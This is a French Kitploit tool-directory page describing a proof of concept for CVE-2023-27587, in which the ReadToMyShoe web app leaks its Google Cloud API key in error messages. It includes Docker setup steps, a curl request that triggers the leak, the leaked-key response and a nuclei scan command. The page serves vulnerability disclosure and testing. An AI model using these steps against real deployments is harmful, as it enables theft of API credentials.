Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-27587-PoC — Le PoC simple de CVE-2023-27587 | Kitploit
Outils/GitHubGitHub/vagnerd/cve-2023-27587-poc
Analyse des VulnérabilitésExploitationCollecte d'InformationsSécurité WebDétection de SecretsSécurité des API
GitHubvagnerd/cve-2023-27587-poc

CVE-2023-27587-PoC

Le PoC simple de CVE-2023-27587

Voir le dépôt
5163il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-27587-PoC

Le simple PoC de CVE-2023-27587

Qu'est-ce que ReadToMyShoe?

ReadtoMyShoe (RTMS) est une application web (rust, yew et axum) qui permet de télécharger des articles (via URL ou par collage direct) et de les écouter plus tard.

Impact

Si une erreur se produit lors de l'ajout d'un article, le site web affiche un message d'erreur à l'utilisateur. Si l'erreur provient de la requête Google Cloud TTS, alors elle inclura l'URL complète de la requête. L'URL de la requête contient la clé API Google Cloud.

PoC

Configuration de ReadtoMyShoe vulnérable

$ git clone https://github.com/rozbb/readtomyshoe.git
$ cd readtomyshoe && git checkout v0.2.0
$ echo "GCP_KEY_LEAKED_TEST" > server/gcp_api.key
$ DOCKER_BUILDKIT=1 docker build -t readtomyshoe-vul .
$ docker run -p 9382:9382 readtomyshoe-vul

Exploitation

La clé n'est exposée que lorsqu'une erreur se produit dans l'appel GCP !

curl 'http://192.168.15.201:9382/api/add-article-by-text' -X POST \
  -H 'Accept-Encoding: gzip, deflate' \
  -H 'content-type: application/json' \
  --data-raw '{"title":"Kernsicherheitstest","body":"Kernsicherheitstest"}'

Erreur de réponse (clé API exposée) :

TTS failed: TTS request failed

Caused by:
    HTTP status client error (400 Bad Request) for url (https://texttospeech.googleapis.com/v1beta1/text:synthesize?key=GCP_KEY_LEAKED_TEST%0A)

Screenshot from 2023-03-15 13-03-59

nuclei-template

https://github.com/projectdiscovery/nuclei-templates/blob/main/cves/2023/CVE-2023-27587.yaml

$ nuclei -t cves/2023/CVE-2023-27587.yaml -u http://<host>

Screenshot from 2023-03-15 13-22-23

Références

https://github.com/rozbb/readtomyshoe/security/advisories/GHSA-23g5-r34j-mr8g

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27587

https://beta.readtomyshoe.com/

Télécharger l’outil